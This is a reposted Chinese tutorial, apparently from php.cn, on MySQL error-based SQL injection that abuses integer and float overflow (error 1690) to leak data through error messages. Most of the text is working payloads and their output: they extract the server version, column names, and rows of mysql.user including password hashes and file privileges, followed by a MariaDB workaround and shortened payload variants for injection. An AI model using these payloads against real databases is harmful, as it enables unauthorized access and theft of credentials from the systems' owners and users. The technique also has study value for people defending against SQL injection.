新型Mysql报错注入_MySQL

WBOY
リリース: 2016-06-01 13:07:29
オリジナル
1272 人が閲覧しました

原文是俄文,不好做翻译,附上大概的内容:

这种报错注入主要基于Mysql数据类型溢出

 

  1. mysql > SELECT 18446744073709551610 * 2 ;
  2. ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'
  3.  
  4. mysql > SELECT - 1 * 9223372036854775808 ;
  5. ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(- (1) * 9223372036854775808)'
  1. mysql> SELECT * 2 (if ((SELECT * from (SELECT (version ()) ) s), 18446744073709551610, 18446744073709551610));
  2.  
  3. ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if (( Select ' 5.5 'from Dual), 18446744073709551610.18446744073709551610))'
  4.  
  5.  
  1.  
  2. mysql> SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610);
  3.  
  4. ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` AS `article`,`test`.`shop`.`dealer` AS `dealer`,`test`.`shop`.`price` AS `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610))'
  5.  
  6. // Узнаем имена колонок в таблице
  7.  
  8.  
  1. mysql> SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1)
  2.  
  3. ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'localhost','root','*','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','','0','0','0','0','','' from dual limit 1)
  4.  
  5.  

需要注意的是该方法并不适用于于老版的Mysql,除此之外你还需要了解错误信息的长度限制,因为这将决定你可以获取多长的信息:

 

  1. mysys / my_error.c
  2.  
  3. /* Max length of a error message. Should be kept in sync with MYSQL_ERRMSG_SIZE. */
  4. #define ERRMSGSIZE (512)

如果对象是MariaDB(Mysql的一个分支),当你尝试上面的方法时,你可能会看到这样的报错信息:

 

  1. mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))
  2. ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select #),18446744073709551610,18446744073709551610))'

作为解决方案,可以通过这种方式来解决这个问题:

 

  1. mysql> SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a;
  2. ERROR 1690 (22003): BIGINT value is out of range in '(('5.5-MariaDB' is not null) - -(9223372036854775808))'

现在让我们看看能不能让我们的Vector更短一些

//查询数据库版本

 

  1. SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))
  2. =
  3. select 1E308*if((select*from(select version())x),2,2)
  1. SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a
  2. =
  3. select if(x,2,2)*1E308 from(select version()x)y
  1. SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610)
  2. =
  3. select 1E308*if((select*from(select*from mysql.user)``limit 1)>(select*from mysql.user limit 1),2,2)
  1. SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1)
  2. =
  3. select 1E308*if((select*from(select*from mysql.user LIMIT 1)``limit 1)
  1. select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)

[1] [2]  下一页

ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート